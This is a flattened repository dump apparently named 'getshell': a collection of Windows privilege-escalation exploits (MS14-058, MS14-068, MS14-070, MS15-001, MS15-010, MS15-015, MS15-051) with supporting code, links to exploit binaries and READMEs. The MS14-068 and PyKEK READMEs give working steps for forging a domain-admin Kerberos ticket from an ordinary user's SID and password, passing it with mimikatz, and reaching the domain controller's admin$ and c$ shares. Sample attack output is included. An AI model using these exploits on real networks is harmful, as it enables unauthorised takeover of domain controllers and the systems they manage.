24 | Trigger.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named Trigger.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /MS14-058/Trigger/Trigger/Trigger.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /MS14-058/Trigger/Trigger/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // Trigger.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /MS14-058/Trigger/Trigger/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /MS14-058/Trigger/Trigger/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /MS14-058/win7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/win7.png -------------------------------------------------------------------------------- /MS14-068/MS14-068.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-068/MS14-068.exe -------------------------------------------------------------------------------- /MS14-068/README.md: -------------------------------------------------------------------------------- 1 | # MS14-068 2 | 3 | ``` 4 | 将普通域用户权限提升为域控权限 5 | (漏洞利用后,netuse \\swg.server.com\c$可以直接访问域控的网络资源 6 | ``` 7 | 8 | Vulnerability reference: 9 | * [MS14-068](https://technet.microsoft.com/library/security/ms14-068) 10 | * [CVE-2008-4037](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6324) 11 | 12 | ## Usage 13 | 14 | 域管理员:DCwin03 域名:demo.com 普通域用户:hx 15 | 16 | 登录普通域用户hx,cmd中输入"whoami/user"获取sid 17 | demo/hx S-1-5-21-3813283032-1038476579-1047458262-1110 18 | 19 | ![x1](img/x1.png) 20 | ![x2](img/x2.png) 21 | 22 | 退出域用户hx,登录本地用户123 23 | ``` 24 | python ms14-068.py -u hx@demo.com -p pwd_of_hx -s S-1-5-21-3813283032-1038476579-1047458262-1110 -d DCwin03.demo.com 25 | ``` 26 | ![x3](img/x3.png) 27 | ![x4](img/x4.png) 28 | ``` 29 | c:\User\123>Mimikatz.exe "kerberos::ptc TGT_hx@demo.com.ccache" exit 30 | 31 | net use \\DCwin03\admin$ 32 | 33 | dir \\DCwin03\c$ 34 | ``` 35 | 36 | 37 | ## References 38 | * [Additional information about CVE-2014-6324](http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx) 39 | * [深入解读MS14-068漏洞](http://www.freebuf.com/vuls/56081.html) 40 | * [Attack Methods for Gaining Domain Admin Rights in Active Directory](https://adsecurity.org/?p=2362) 41 | * [MS14068域控提权漏洞及其防护](http://www.php230.com/weixin1418640395.html) 42 | * [MS14-068 privilege escalation PoC](http://www.secpulse.com/archives/2874.html) 43 | 44 | -------------------------------------------------------------------------------- /MS14-068/img/x1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-068/img/x1.png -------------------------------------------------------------------------------- /MS14-068/img/x2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-068/img/x2.png -------------------------------------------------------------------------------- /MS14-068/img/x3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-068/img/x3.png -------------------------------------------------------------------------------- /MS14-068/img/x4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-068/img/x4.png -------------------------------------------------------------------------------- /MS14-068/mimikatz_trunk.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-068/mimikatz_trunk.zip -------------------------------------------------------------------------------- /MS14-068/pykek/README.md: -------------------------------------------------------------------------------- 1 | Python Kerberos Exploitation Kit 2 | === 3 | 4 | PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development) 5 | 6 | For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit MS14-068 (CVE-2014-6324) . 7 | 8 | More is coming... 9 | 10 | # Author 11 | Sylvain Monné 12 | 13 | Contact : sylvain dot monne at solucom dot fr 14 | 15 | http://twitter.com/bidord 16 | 17 | Special thanks to: Benjamin DELPY `gentilkiwi` 18 | 19 | # Library content 20 | * kek.krb5: Kerberos V5 ([RFC 4120](https://tools.ietf.org/html/rfc4120)) ASN.1 structures and basic protocol functions 21 | * kek.ccache: Credential Cache Binary Format ([cchache](http://www.gnu.org/software/shishi/manual/html_node/The-Credential-Cache-Binary-File-Format.html)) 22 | * kek.pac: Microsoft Privilege Attribute Certificate Data Structure ([MS-PAC](http://msdn.microsoft.com/en-us/library/cc237917.aspx)) 23 | * kek.crypto: Kerberos and MS specific cryptographic functions 24 | 25 | # Exploits 26 | ## ms14-068.py 27 | Exploits [MS14-680](https://technet.microsoft.com/en-us/library/security/ms14-068.aspx) vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups : 28 | - Domain Users (513) 29 | - Domain Admins (512) 30 | - Schema Admins (518) 31 | - Enterprise Admins (519) 32 | - Group Policy Creator Owners (520) 33 | 34 | ### Usage : 35 | ``` 36 | USAGE: 37 | ms14-068.py -u @ -s -d 38 | 39 | OPTIONS: 40 | -p 41 | --rc4 42 | ``` 43 | ### Example usage : 44 | #### Linux (tested with samba and MIT Kerberos) 45 | ``` 46 | root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc 47 | Password: 48 | [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done! 49 | [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done! 50 | [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done! 51 | [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done! 52 | [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done! 53 | [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done! 54 | [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done! 55 | [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done! 56 | [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done! 57 | root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0 58 | ``` 59 | #### On Windows 60 | 61 | ``` 62 | python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc 63 | mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit` 64 | ``` 65 | -------------------------------------------------------------------------------- /MS14-068/pykek/kek/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-068/pykek/kek/__init__.py -------------------------------------------------------------------------------- /MS14-068/pykek/kek/_crypto/ARC4.py: -------------------------------------------------------------------------------- 1 | class ARC4Cipher(object): 2 | def __init__(self, key): 3 | self.key = key 4 | 5 | def encrypt(self, data): 6 | S = range(256) 7 | j = 0 8 | out = [] 9 | for i in range(256): 10 | j = (j + S[i] + ord( self.key[i % len(self.key)] )) % 256 11 | S[i] , S[j] = S[j] , S[i] 12 | i = j = 0 13 | for char in data: 14 | i = ( i + 1 ) % 256 15 | j = ( j + S[i] ) % 256 16 | S[i] , S[j] = S[j] , S[i] 17 | out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256])) 18 | return ''.join(out) 19 | 20 | def decrypt(self, data): 21 | return self.encrypt(data) 22 | 23 | def new(key): 24 | return ARC4Cipher(key) 25 | -------------------------------------------------------------------------------- /MS14-068/pykek/kek/_crypto/MD4.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | 3 | def new(*args): 4 | return hashlib.new('md4', *args) 5 | -------------------------------------------------------------------------------- /MS14-068/pykek/kek/_crypto/MD5.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | 3 | def new(*args): 4 | return hashlib.md5(*args) 5 | -------------------------------------------------------------------------------- /MS14-068/pykek/kek/_crypto/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-068/pykek/kek/_crypto/__init__.py -------------------------------------------------------------------------------- /MS14-068/pykek/kek/crypto.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Author 4 | # ------ 5 | # Sylvain Monne 6 | # Contact : sylvain dot monne at solucom dot fr 7 | # http://twitter.com/bidord 8 | 9 | from random import getrandbits, sample 10 | from struct import pack 11 | 12 | try: 13 | from Crypto.Cipher import ARC4 14 | from Crypto.Hash import HMAC, MD5, MD4 15 | except ImportError: 16 | from _crypto import ARC4, MD5, MD4 17 | import hmac as HMAC 18 | 19 | # supported encryptions 20 | RC4_HMAC = 23 21 | 22 | # suported checksum 23 | RSA_MD5 = 7 24 | HMAC_MD5 = 0xFFFFFF76 25 | 26 | def random_bytes(n): 27 | return ''.join(chr(c) for c in sample(xrange(256), n)) 28 | 29 | def decrypt(etype, key, msg_type, encrypted): 30 | if etype != RC4_HMAC: 31 | raise NotImplementedError('Only RC4-HMAC supported!') 32 | chksum = encrypted[:16] 33 | data = encrypted[16:] 34 | k1 = HMAC.new(key, pack(' 0: 43 | idx = idx - 1 44 | if client[idx] is None: # Optional component 45 | continue 46 | if client.getDefaultComponentByPosition(idx) == client[idx]: 47 | continue 48 | comps.append(client[idx]) 49 | comps.sort(key=lambda x: isinstance(x, univ.Choice) and \ 50 | x.getMinTagSet() or x.getTagSet()) 51 | for c in comps: 52 | substrate += encodeFun(c, defMode, maxChunkSize) 53 | else: 54 | # SetOf 55 | compSubs = [] 56 | while idx > 0: 57 | idx = idx - 1 58 | compSubs.append( 59 | encodeFun(client[idx], defMode, maxChunkSize) 60 | ) 61 | compSubs.sort() # perhaps padding's not needed 62 | substrate = null 63 | for compSub in compSubs: 64 | substrate += compSub 65 | return substrate, 1 66 | 67 | tagMap = encoder.tagMap.copy() 68 | tagMap.update({ 69 | univ.Boolean.tagSet: BooleanEncoder(), 70 | univ.BitString.tagSet: BitStringEncoder(), 71 | univ.OctetString.tagSet: OctetStringEncoder(), 72 | univ.SetOf().tagSet: SetOfEncoder() # conflcts with Set 73 | }) 74 | 75 | typeMap = encoder.typeMap.copy() 76 | typeMap.update({ 77 | univ.Set.typeId: SetOfEncoder(), 78 | univ.SetOf.typeId: SetOfEncoder() 79 | }) 80 | 81 | class Encoder(encoder.Encoder): 82 | def __call__(self, client, defMode=0, maxChunkSize=0): 83 | return encoder.Encoder.__call__(self, client, defMode, maxChunkSize) 84 | 85 | encode = Encoder(tagMap, typeMap) 86 | 87 | # EncoderFactory queries class instance and builds a map of tags -> encoders 88 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/codec/der/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is necessary to make this directory a package. 2 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/codec/der/decoder.py: -------------------------------------------------------------------------------- 1 | # DER decoder 2 | from pyasn1.type import univ 3 | from pyasn1.codec.cer import decoder 4 | 5 | tagMap = decoder.tagMap 6 | typeMap = decoder.typeMap 7 | Decoder = decoder.Decoder 8 | 9 | decode = Decoder(tagMap, typeMap) 10 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/codec/der/encoder.py: -------------------------------------------------------------------------------- 1 | # DER encoder 2 | from pyasn1.type import univ 3 | from pyasn1.codec.cer import encoder 4 | 5 | class SetOfEncoder(encoder.SetOfEncoder): 6 | def _cmpSetComponents(self, c1, c2): 7 | tagSet1 = isinstance(c1, univ.Choice) and \ 8 | c1.getEffectiveTagSet() or c1.getTagSet() 9 | tagSet2 = isinstance(c2, univ.Choice) and \ 10 | c2.getEffectiveTagSet() or c2.getTagSet() 11 | return cmp(tagSet1, tagSet2) 12 | 13 | tagMap = encoder.tagMap.copy() 14 | tagMap.update({ 15 | # Overload CER encodrs with BER ones (a bit hackerish XXX) 16 | univ.BitString.tagSet: encoder.encoder.BitStringEncoder(), 17 | univ.OctetString.tagSet: encoder.encoder.OctetStringEncoder(), 18 | # Set & SetOf have same tags 19 | univ.SetOf().tagSet: SetOfEncoder() 20 | }) 21 | 22 | typeMap = encoder.typeMap 23 | 24 | class Encoder(encoder.Encoder): 25 | def __call__(self, client, defMode=1, maxChunkSize=0): 26 | return encoder.Encoder.__call__(self, client, defMode, maxChunkSize) 27 | 28 | encode = Encoder(tagMap, typeMap) 29 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/compat/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is necessary to make this directory a package. 2 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/compat/octets.py: -------------------------------------------------------------------------------- 1 | from sys import version_info 2 | 3 | if version_info[0] <= 2: 4 | int2oct = chr 5 | ints2octs = lambda s: ''.join([ int2oct(x) for x in s ]) 6 | null = '' 7 | oct2int = ord 8 | octs2ints = lambda s: [ oct2int(x) for x in s ] 9 | str2octs = lambda x: x 10 | octs2str = lambda x: x 11 | isOctetsType = lambda s: isinstance(s, str) 12 | else: 13 | ints2octs = bytes 14 | int2oct = lambda x: ints2octs((x,)) 15 | null = ints2octs() 16 | oct2int = lambda x: x 17 | octs2ints = lambda s: [ x for x in s ] 18 | str2octs = lambda x: x.encode() 19 | octs2str = lambda x: x.decode() 20 | isOctetsType = lambda s: isinstance(s, bytes) 21 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/debug.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from pyasn1.compat.octets import octs2ints 3 | from pyasn1 import error 4 | from pyasn1 import __version__ 5 | 6 | flagNone = 0x0000 7 | flagEncoder = 0x0001 8 | flagDecoder = 0x0002 9 | flagAll = 0xffff 10 | 11 | flagMap = { 12 | 'encoder': flagEncoder, 13 | 'decoder': flagDecoder, 14 | 'all': flagAll 15 | } 16 | 17 | class Debug: 18 | defaultPrinter = sys.stderr.write 19 | def __init__(self, *flags): 20 | self._flags = flagNone 21 | self._printer = self.defaultPrinter 22 | self('running pyasn1 version %s' % __version__) 23 | for f in flags: 24 | if f not in flagMap: 25 | raise error.PyAsn1Error('bad debug flag %s' % (f,)) 26 | self._flags = self._flags | flagMap[f] 27 | self('debug category \'%s\' enabled' % f) 28 | 29 | def __str__(self): 30 | return 'logger %s, flags %x' % (self._printer, self._flags) 31 | 32 | def __call__(self, msg): 33 | self._printer('DBG: %s\n' % msg) 34 | 35 | def __and__(self, flag): 36 | return self._flags & flag 37 | 38 | def __rand__(self, flag): 39 | return flag & self._flags 40 | 41 | logger = 0 42 | 43 | def setLogger(l): 44 | global logger 45 | logger = l 46 | 47 | def hexdump(octets): 48 | return ' '.join( 49 | [ '%s%.2X' % (n%16 == 0 and ('\n%.5d: ' % n) or '', x) 50 | for n,x in zip(range(len(octets)), octs2ints(octets)) ] 51 | ) 52 | 53 | class Scope: 54 | def __init__(self): 55 | self._list = [] 56 | 57 | def __str__(self): return '.'.join(self._list) 58 | 59 | def push(self, token): 60 | self._list.append(token) 61 | 62 | def pop(self): 63 | return self._list.pop() 64 | 65 | scope = Scope() 66 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/error.py: -------------------------------------------------------------------------------- 1 | class PyAsn1Error(Exception): pass 2 | class ValueConstraintError(PyAsn1Error): pass 3 | class SubstrateUnderrunError(PyAsn1Error): pass 4 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/type/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is necessary to make this directory a package. 2 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/type/char.py: -------------------------------------------------------------------------------- 1 | # ASN.1 "character string" types 2 | from pyasn1.type import univ, tag 3 | 4 | class UTF8String(univ.OctetString): 5 | tagSet = univ.OctetString.tagSet.tagImplicitly( 6 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 12) 7 | ) 8 | encoding = "utf-8" 9 | 10 | class NumericString(univ.OctetString): 11 | tagSet = univ.OctetString.tagSet.tagImplicitly( 12 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 18) 13 | ) 14 | 15 | class PrintableString(univ.OctetString): 16 | tagSet = univ.OctetString.tagSet.tagImplicitly( 17 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 19) 18 | ) 19 | 20 | class TeletexString(univ.OctetString): 21 | tagSet = univ.OctetString.tagSet.tagImplicitly( 22 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 20) 23 | ) 24 | 25 | 26 | class VideotexString(univ.OctetString): 27 | tagSet = univ.OctetString.tagSet.tagImplicitly( 28 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 21) 29 | ) 30 | 31 | class IA5String(univ.OctetString): 32 | tagSet = univ.OctetString.tagSet.tagImplicitly( 33 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 22) 34 | ) 35 | 36 | class GraphicString(univ.OctetString): 37 | tagSet = univ.OctetString.tagSet.tagImplicitly( 38 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 25) 39 | ) 40 | 41 | class VisibleString(univ.OctetString): 42 | tagSet = univ.OctetString.tagSet.tagImplicitly( 43 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 26) 44 | ) 45 | 46 | class GeneralString(univ.OctetString): 47 | tagSet = univ.OctetString.tagSet.tagImplicitly( 48 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 27) 49 | ) 50 | 51 | class UniversalString(univ.OctetString): 52 | tagSet = univ.OctetString.tagSet.tagImplicitly( 53 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 28) 54 | ) 55 | encoding = "utf-32-be" 56 | 57 | class BMPString(univ.OctetString): 58 | tagSet = univ.OctetString.tagSet.tagImplicitly( 59 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 30) 60 | ) 61 | encoding = "utf-16-be" 62 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/type/error.py: -------------------------------------------------------------------------------- 1 | from pyasn1.error import PyAsn1Error 2 | 3 | class ValueConstraintError(PyAsn1Error): pass 4 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/type/namedval.py: -------------------------------------------------------------------------------- 1 | # ASN.1 named integers 2 | from pyasn1 import error 3 | 4 | __all__ = [ 'NamedValues' ] 5 | 6 | class NamedValues: 7 | def __init__(self, *namedValues): 8 | self.nameToValIdx = {}; self.valToNameIdx = {} 9 | self.namedValues = () 10 | automaticVal = 1 11 | for namedValue in namedValues: 12 | if isinstance(namedValue, tuple): 13 | name, val = namedValue 14 | else: 15 | name = namedValue 16 | val = automaticVal 17 | if name in self.nameToValIdx: 18 | raise error.PyAsn1Error('Duplicate name %s' % (name,)) 19 | self.nameToValIdx[name] = val 20 | if val in self.valToNameIdx: 21 | raise error.PyAsn1Error('Duplicate value %s=%s' % (name, val)) 22 | self.valToNameIdx[val] = name 23 | self.namedValues = self.namedValues + ((name, val),) 24 | automaticVal = automaticVal + 1 25 | def __str__(self): return str(self.namedValues) 26 | 27 | def getName(self, value): 28 | if value in self.valToNameIdx: 29 | return self.valToNameIdx[value] 30 | 31 | def getValue(self, name): 32 | if name in self.nameToValIdx: 33 | return self.nameToValIdx[name] 34 | 35 | def __getitem__(self, i): return self.namedValues[i] 36 | def __len__(self): return len(self.namedValues) 37 | 38 | def __add__(self, namedValues): 39 | return self.__class__(*self.namedValues + namedValues) 40 | def __radd__(self, namedValues): 41 | return self.__class__(*namedValues + tuple(self)) 42 | 43 | def clone(self, *namedValues): 44 | return self.__class__(*tuple(self) + namedValues) 45 | 46 | # XXX clone/subtype? 47 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/type/tagmap.py: -------------------------------------------------------------------------------- 1 | from pyasn1 import error 2 | 3 | class TagMap: 4 | def __init__(self, posMap={}, negMap={}, defType=None): 5 | self.__posMap = posMap.copy() 6 | self.__negMap = negMap.copy() 7 | self.__defType = defType 8 | 9 | def __contains__(self, tagSet): 10 | return tagSet in self.__posMap or \ 11 | self.__defType is not None and tagSet not in self.__negMap 12 | 13 | def __getitem__(self, tagSet): 14 | if tagSet in self.__posMap: 15 | return self.__posMap[tagSet] 16 | elif tagSet in self.__negMap: 17 | raise error.PyAsn1Error('Key in negative map') 18 | elif self.__defType is not None: 19 | return self.__defType 20 | else: 21 | raise KeyError() 22 | 23 | def __repr__(self): 24 | s = '%r/%r' % (self.__posMap, self.__negMap) 25 | if self.__defType is not None: 26 | s = s + '/%r' % (self.__defType,) 27 | return s 28 | 29 | def clone(self, parentType, tagMap, uniq=False): 30 | if self.__defType is not None and tagMap.getDef() is not None: 31 | raise error.PyAsn1Error('Duplicate default value at %s' % (self,)) 32 | if tagMap.getDef() is not None: 33 | defType = tagMap.getDef() 34 | else: 35 | defType = self.__defType 36 | 37 | posMap = self.__posMap.copy() 38 | for k in tagMap.getPosMap(): 39 | if uniq and k in posMap: 40 | raise error.PyAsn1Error('Duplicate positive key %s' % (k,)) 41 | posMap[k] = parentType 42 | 43 | negMap = self.__negMap.copy() 44 | negMap.update(tagMap.getNegMap()) 45 | 46 | return self.__class__( 47 | posMap, negMap, defType, 48 | ) 49 | 50 | def getPosMap(self): return self.__posMap.copy() 51 | def getNegMap(self): return self.__negMap.copy() 52 | def getDef(self): return self.__defType 53 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/type/useful.py: -------------------------------------------------------------------------------- 1 | # ASN.1 "useful" types 2 | from pyasn1.type import char, tag 3 | 4 | class GeneralizedTime(char.VisibleString): 5 | tagSet = char.VisibleString.tagSet.tagImplicitly( 6 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 24) 7 | ) 8 | 9 | class UTCTime(char.VisibleString): 10 | tagSet = char.VisibleString.tagSet.tagImplicitly( 11 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 23) 12 | ) 13 | -------------------------------------------------------------------------------- /MS14-070/MS14-070.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-070/MS14-070.rar -------------------------------------------------------------------------------- /MS14-070/MS14-070/35936.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-070/MS14-070/35936.exe -------------------------------------------------------------------------------- /MS14-070/MS14-070/37755.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-070/MS14-070/37755.exe -------------------------------------------------------------------------------- /MS14-070/README.md: -------------------------------------------------------------------------------- 1 | # MS14-070 2 | 3 | - The exp was from [@dev-zzo](https://github.com/dev-zzo/exploits-nt-privesc/blob/master/MS14-070/MS14-070.c) 4 | 5 | Vulnerability reference: 6 | * [MS14-070](https://technet.microsoft.com/library/security/ms14-070) 7 | * [CVE-2014-4076](https://www.exploit-db.com/exploits/37755/) 8 | 9 | ## Usage 10 | c:\> MS14-070.exe 11 | 12 | ![win2003](win2003.png) 13 | 14 | 15 | ## Links 16 | 17 | - [Microsoft Windows Server 2003 SP2 (CVE-2014-4076)](https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt) 18 | -------------------------------------------------------------------------------- /MS14-070/win2003.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-070/win2003.png -------------------------------------------------------------------------------- /MS15-001/AppCompatCache.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-001/AppCompatCache.exe -------------------------------------------------------------------------------- /MS15-001/README.md: -------------------------------------------------------------------------------- 1 | # MS15-001 2 | 3 | MS15-001 4 | 5 | 6 | Vulnerability reference: 7 | * [MS15-001](https://technet.microsoft.com/library/security/ms15-001) 8 | * [CVE-2015-0002](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0002) 9 | 10 | 11 | ## References 12 | * [Project Zero](http://googleprojectzero.blogspot.com/2015/02/a-tokens-tale_9.html) 13 | * [令牌的故事(CVE-2015-0002) - cssembly](http://www.vuln.cn/6702) 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /MS15-001/TestDLL.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-001/TestDLL.dll -------------------------------------------------------------------------------- /MS15-001/source.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-001/source.zip -------------------------------------------------------------------------------- /MS15-010/39035.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-010/39035.exe -------------------------------------------------------------------------------- /MS15-010/CVE-2015-0057.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-010/CVE-2015-0057.zip -------------------------------------------------------------------------------- /MS15-010/README.md: -------------------------------------------------------------------------------- 1 | # MS15-010 2 | 3 | - The POC was from [@Offensive Security](https://github.com/offensive-security/exploit-database-bin-sploits/tree/master/sploits) 4 | 5 | 6 | Vulnerability reference: 7 | * [MS15-010](https://technet.microsoft.com/en-us/library/security/ms15-010.aspx) 8 | * [CVE-2015-0003](https://www.exploit-db.com/exploits/37098/) 9 | 10 | 11 | ### Links 12 | 13 | * [Dyre Banking Trojan Exploits CVE-2015-0057](https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html) 14 | * [Windows 8 Heap Internals](http://illmatics.com/Windows%208%20Heap%20Internals.pdf) 15 | * [Kernel Attacks through User-Mode Callbacks](https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf) 16 | -------------------------------------------------------------------------------- /MS15-015/README.md: -------------------------------------------------------------------------------- 1 | # MS15-015 2 | 3 | ``` 4 | An elevation of privilege vulnerability exists in Microsoft Windows when it fails to properly validate and enforce impersonation levels. 5 | An attacker who successfully exploited this vulnerability could bypass impersonation-level security checks and gain elevated privileges on a targeted system. 6 | This vulnerability can be exploited only in the specific scenario where the process uses SeAssignPrimaryTokenPrivilege, which is not available for normal processes. 7 | ``` 8 | 9 | 10 | Vulnerability reference: 11 | * [MS15-015](https://technet.microsoft.com/zh-cn/library/security/ms15-015.aspx) 12 | * [CVE-2015-0062](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0062) 13 | 14 | ## Usage 15 | ``` 16 | c:\> MS15-015.exe "whoami" 17 | ``` 18 | 19 | ## Thanks 20 | 感谢 **@浮萍** 帮助补充完善 -------------------------------------------------------------------------------- /MS15-015/ms15-015.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-015/ms15-015.zip -------------------------------------------------------------------------------- /MS15-051/2008.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-051/2008.png -------------------------------------------------------------------------------- /MS15-051/37049-32.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-051/37049-32.exe -------------------------------------------------------------------------------- 